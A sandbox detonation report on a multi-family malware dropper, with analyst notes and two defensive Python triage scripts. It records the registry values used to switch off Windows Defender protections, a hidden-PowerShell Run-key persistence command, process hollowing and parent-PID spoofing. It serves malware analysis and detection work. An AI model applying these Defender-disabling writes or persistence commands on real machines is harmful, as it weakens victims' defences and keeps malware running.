Analysis Overview
SHA256
db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716
Threat Level: Known bad
The file db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716 was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
Glupteba payload
Glupteba
RedLine payload
DcRat
RedLine
Raccoon
Suspicious use of NtCreateUserProcessOtherParentProcess
SmokeLoader
ZGRat
Raccoon Stealer payload
Amadey
Modifies Windows Defender Real-time Protection settings
Drops file in Drivers directory
Downloads MZ/PE file
Stops running service(s)
Modifies Windows Firewall
Checks computer location settings
Windows security modification
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Uses Task Scheduler COM API
Creates scheduled task(s)
Suspicious behavior: MapViewOfSection
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1
Detonation Overview
Reported
2023-10-26 09:01
Signatures
Unsigned PE
One match recorded; the report gives no description, indicator, process or target for it.
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 09:01
Reported
2023-10-26 09:04
Platform
win10v2004-20231023-en
Max time kernel
112s
Max time network
153s
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detect ZGRat V1
Three matches recorded; the report gives no description, indicator, process or target for them.
Glupteba
Glupteba payload
Seven matches recorded; the report gives no description, indicator, process or target for them.
Modifies Windows Defender Real-time Protection settings
Note: A298.exe (a 32-bit process, hence the WOW6432Node view of the key) sets the Real-Time Protection policy values that turn off on-access protection, real-time monitoring, scan-on-enable, behavior monitoring and IOAV download scanning. On a host with Tamper Protection enabled Defender does not honour these values, so the rows record an attempt rather than a confirmed effect; on a host without it, the same six writes would disable those protections.
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
Raccoon
Raccoon Stealer payload
Three matches recorded; the report gives no description, indicator, process or target for them.
RedLine
RedLine payload
Ten matches recorded; the report gives no description, indicator, process or target for them.
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Note: the five rows are one pattern repeated. latestX.exe (PID 3956) creates processes whose recorded parent is Explorer.EXE (PID 3284) rather than itself, i.e. parent-PID spoofing through the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS creation attribute. Its children therefore hang off Explorer in a process tree, so pivot on the creating PID rather than on the parent link.
| Description | Indicator | Process | Target |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
Note: the only file matched is C:\Windows\System32\drivers\etc\hosts, written by latestX.exe. This is a hosts-file modification (local name-resolution tampering), not a kernel driver drop as the signature name suggests; on an affected host, check the hosts file for entries that redirect or blackhole update and security-vendor domains.
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
Note: only the netsh.exe launch is recorded; the command line, and therefore the rule added or removed, is not in this report.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
Note: Control Panel\International\Geo\Nation holds the user's country (GeoID). Commodity loaders read it to skip or select victims by region; here the Inno Setup installer stub (LzmwAqmV.tmp), kos4.exe, A345.exe and explothe.exe all query it.
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\A345.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4DC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4DC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FEE7.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Windows security modification
Note: A298.exe writes TamperProtection = 0 under the Defender Features key. That value is itself protected by Tamper Protection, so writing it from a user-mode process does not turn the feature off; treat the row as an attempt, not a result.
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
Adds Run key to start application
Note: two different things share this table. The wextract_cleanupN RunOnce values (rundll32 advpack.dll,DelNodeRunDLL32 on an IXP00n.TMP folder) are the standard self-cleanup entries written by Microsoft's IExpress/WEXTRACT self-extractor stub, a side effect of the five nested self-extracting layers, not persistence. The only persistence here is the HKCU Run value socks5, which relaunches C7D7.exe through a hidden PowerShell window at every logon.
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\C7D7.exe'\"" | C:\Users\Admin\AppData\Local\Temp\C7D7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\9EEB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe | N/A |
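The three registry tables above (Defender Real-time Protection, Windows security modification, Run keys) are easiest to reason about once each Set value row is normalised and bucketed. The following Python is an added example written for this edit; it is not code from the sandbox vendor, from the report or from the malware authors. It copies six rows from those tables as constructed input; the verdict names, the rule that a .DEFAULT hive write means the writer ran as SYSTEM, and the wextract_cleanup heuristic are the editor's own assumptions.

```python
"""Triage registry 'Set value' rows copied from a sandbox report.

Added example (editor's code, not the sandbox vendor's and not part of the
report). SAMPLE_ROWS is copied from the tables above; the classification
rules and verdict names are the editor's heuristics.
"""
import re
from collections import Counter

# Constructed input: six 'Set value' rows taken verbatim from this report.
SAMPLE_ROWS = r"""
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\C7D7.exe'\"" | C:\Users\Admin\AppData\Local\Temp\C7D7.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
"""

# Defender policy values under Real-Time Protection whose names start with
# "Disable" switch a protection off when set to 1.
DEFENDER_RTP = r"\policies\microsoft\windows defender\real-time protection\disable"
DEFENDER_TP = r"\microsoft\windows defender\features\tamperprotection"
AUTORUN_RE = re.compile(r"\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
# IExpress/WEXTRACT self-extractors register this rundll32 call to delete
# their own IXP00n.TMP folder on next logon (editor's heuristic).
WEXTRACT_RE = re.compile(r"advpack\.dll,DelNodeRunDLL32", re.I)
SUSPICIOUS_CMD_RE = re.compile(r"powershell|\\appdata\\local\\temp\\", re.I)


def normalize(path):
    """Map the sandbox's native key names to HKLM/HKU and drop the WOW6432Node
    redirection so 32-bit and 64-bit writers hit the same rules."""
    p = re.sub(r"^\\REGISTRY\\MACHINE", "HKLM", path, flags=re.I)
    p = re.sub(r"^\\REGISTRY\\USER", "HKU", p, flags=re.I)
    return re.sub(r"\\WOW6432Node", "", p, flags=re.I)


def parse_row(row):
    """Split one 'Set value' table row into an event; None for other rows."""
    cells = [c.strip() for c in row.strip().strip("|").split(" | ")]
    if len(cells) != 4 or not cells[0].startswith("Set value"):
        return None
    path, _, value = cells[1].partition(' = "')
    if value.endswith('"'):
        value = value[:-1]  # the report quotes the value; strip the closing quote
    return {"path": path, "value": value, "process": cells[2]}


def hive_context(norm_path):
    """HKU\\.DEFAULT is the profile hive LocalSystem uses, so a write there
    tells you the process ran as SYSTEM (editor's rule)."""
    low = norm_path.lower()
    if low.startswith("hku\\.default\\"):
        return "SYSTEM (.DEFAULT hive)"
    if low.startswith("hku\\s-1-5-21-"):
        return "interactive user"
    return "machine-wide"


def classify(ev):
    low = ev["path"].lower()
    value = ev["value"]
    if DEFENDER_RTP in low and value == "1":
        return "defender_tamper"
    if low.endswith(DEFENDER_TP) and value == "0":
        return "defender_tamper"
    if AUTORUN_RE.search(low):
        name = low.rsplit("\\", 1)[-1]
        if name.startswith("wextract_cleanup") and WEXTRACT_RE.search(value):
            return "packer_cleanup"        # self-extractor housekeeping, not persistence
        if SUSPICIOUS_CMD_RE.search(value):
            return "persistence_suspicious"  # hidden PowerShell or a Temp binary at logon
        return "persistence"
    return "other"


def triage(text):
    events = []
    for line in text.splitlines():
        ev = parse_row(line)
        if ev is None:
            continue
        ev["path"] = normalize(ev["path"])
        ev["verdict"] = classify(ev)
        ev["context"] = hive_context(ev["path"])
        events.append(ev)
    return events


def summarize(text):
    return Counter(ev["verdict"] for ev in triage(text))


if __name__ == "__main__":
    for ev in triage(SAMPLE_ROWS):
        name = ev["path"].rsplit("\\", 1)[-1]
        print(f"{ev['verdict']:<24}{ev['context']:<24}{name:<30}{ev['process']}")
    print(dict(summarize(SAMPLE_ROWS)))
```

The same parse and normalise step works on any Set value row exported from a report of this shape; dropping WOW6432Node matters because a 32-bit dropper and a 64-bit dropper writing the same Defender policy should trigger the same rule.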
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Note: setting the thread context of another process is the hand-off step of process hollowing (the target is started suspended, its image is replaced, and the entry point is redirected). Three of the four rows target signed Microsoft .NET utilities, AppLaunch.exe twice and RegAsm.exe once, so the payloads run under trusted image names; toolspub2.exe hollows a second instance of itself. The RegAsm.exe instance reappears in the Program crash table.
| Description | Indicator | Process | Target |
| PID 2860 set thread context of 5000 | N/A | C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1844 set thread context of 4268 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1360 set thread context of 1912 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 4784 set thread context of 4908 | N/A | C:\Users\Admin\AppData\Local\Temp\FEE7.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
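The NtCreateUserProcessOtherParentProcess rows above and the SetThreadContext rows in this table describe the same injection chain from two angles: who hollowed what, and who hid behind Explorer. As an added example (editor's code, not part of the report and not the sandbox's own signature logic), this Python parses both row types, flags hollowing into signed .NET hosts and Explorer-parented PPID spoofing, and collapses the repeated rows. The rows are copied from this page; the host list and the verdict names are assumptions of the example.

```python
"""Triage process-manipulation rows copied from a sandbox report.

Added example (editor's code; not from the sandbox vendor or the report).
SAMPLE_ROWS is copied from the SetThreadContext and
NtCreateUserProcessOtherParentProcess tables on this page; DOTNET_HOSTS and
the verdict names are the editor's own.
"""
import re
from collections import Counter

# Constructed input: rows taken verbatim from this report (two copies of the
# PPID-spoofing row, which the report repeats five times).
SAMPLE_ROWS = r"""
| PID 2860 set thread context of 5000 | N/A | C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1844 set thread context of 4268 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1360 set thread context of 1912 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 4784 set thread context of 4908 | N/A | C:\Users\Admin\AppData\Local\Temp\FEE7.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
"""

# Signed Microsoft .NET utilities routinely started suspended and hollowed so
# a payload runs under a trusted image name (editor's list, not exhaustive).
DOTNET_HOSTS = {"applaunch.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
EVENT_RE = re.compile(r"^PID (\d+) (set thread context of|created) (\d+)$")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_row(row):
    """Split one table row into an event; None for rows without a PID event."""
    cells = [c.strip() for c in row.strip().strip("|").split(" | ")]
    if len(cells) != 4:
        return None
    m = EVENT_RE.match(cells[0])
    if not m:
        return None
    return {
        "pid": int(m.group(1)),
        "action": "set_thread_context" if m.group(2).startswith("set") else "created",
        "other_pid": int(m.group(3)),
        "source": cells[2],
        "target": cells[3],
        "source_in_temp": bool(TEMP_RE.search(cells[2])),
    }


def classify(ev):
    src, tgt = basename(ev["source"]), basename(ev["target"])
    if ev["action"] == "set_thread_context":
        if tgt in DOTNET_HOSTS:
            return "hollowing_dotnet_host"
        if src == tgt:
            return "self_injection"  # a second instance of the same binary
        return "thread_context_other"
    # 'created' rows come from NtCreateUserProcessOtherParentProcess: the
    # recorded parent (target column) is not the creating process.
    if tgt == "explorer.exe" and src != "explorer.exe":
        return "ppid_spoofing_explorer"
    return "ppid_spoofing"


def triage(text):
    events = []
    for line in text.splitlines():
        ev = parse_row(line)
        if ev:
            ev["verdict"] = classify(ev)
            events.append(ev)
    return events


def summarize(text):
    return Counter(ev["verdict"] for ev in triage(text))


def dedupe(events):
    """Collapse repeated identical rows into (source, target, verdict, count)."""
    counts = Counter(
        (basename(e["source"]), basename(e["target"]), e["verdict"]) for e in events
    )
    return sorted((s, t, v, n) for (s, t, v), n in counts.items())


if __name__ == "__main__":
    evs = triage(SAMPLE_ROWS)
    for src, tgt, verdict, n in dedupe(evs):
        print(f"{verdict:<24}{src:<40}-> {tgt:<16}x{n}")
    print(dict(summarize(SAMPLE_ROWS)))
```

Every source binary in these rows lives under AppData\Local\Temp, which the example records as source_in_temp; a hunting rule built from this would key on "Temp-resident, unsigned binary calls SetThreadContext on a .NET framework host" rather than on the individual file names, which change with every build of the dropper.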
Drops file in Program Files directory
Note: nearly every row is an Inno Setup intermediate (is-XXXXX.tmp, unins000.dat) written by the installer stub LzmwAqmV.tmp into Program Files (x86)\Drive Tools. The row to act on is latestX.exe creating C:\Program Files\Google\Chrome\updater.exe: a dropper-written binary placed under Chrome's directory to pass as a Google component.
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\zDriveTools.exe | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-QHIS9.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-92N1I.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-346PL.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-NHV86.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-UDRBQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-35863.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-TJOHU.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-Q39LK.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\Lang\is-3MU64.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-K1T3V.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-KVQLA.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-KNKI9.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2JNJ9.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-J503B.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-7415O.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-UGRQO.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-9MS75.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-1D08O.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-SNUM9.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-FOIIJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-F63PC.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
Drops file in Windows directory
Note: A4DC.exe opens a file with a randomly generated pseudo-word name directly under C:\Windows; the same process later crashes (see Program crash).
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | C:\Users\Admin\AppData\Local\Temp\A4DC.exe | N/A |
Launches sc.exe
Note: ten sc.exe invocations with no recorded command line. Together with the Stops running service(s) signature this points to service tampering, but which services were targeted cannot be read from this report.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Note: WerFault.exe handled crashes of A4DC.exe, CDE3.exe and the RegAsm.exe instance that FEE7.exe had injected into. Crashed components did not run to completion, so the behaviour recorded for them is a lower bound.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\A4DC.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\CDE3.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Checks SCSI registry key(s)
Note: enumerating HKLM\SYSTEM\ControlSet001\Enum\SCSI exposes the disk device identifiers, which on a virtual machine carry hypervisor vendor strings (for example VBOX, VMware or QEMU). It is a common sandbox/VM check, performed here by toolspub2.exe and by the hollowed AppLaunch.exe.
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
Note: these BIOS manufacturer/product queries come from msedge.exe, which Chromium-based browsers perform themselves, not from a dropped binary; the signature adds nothing here.
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
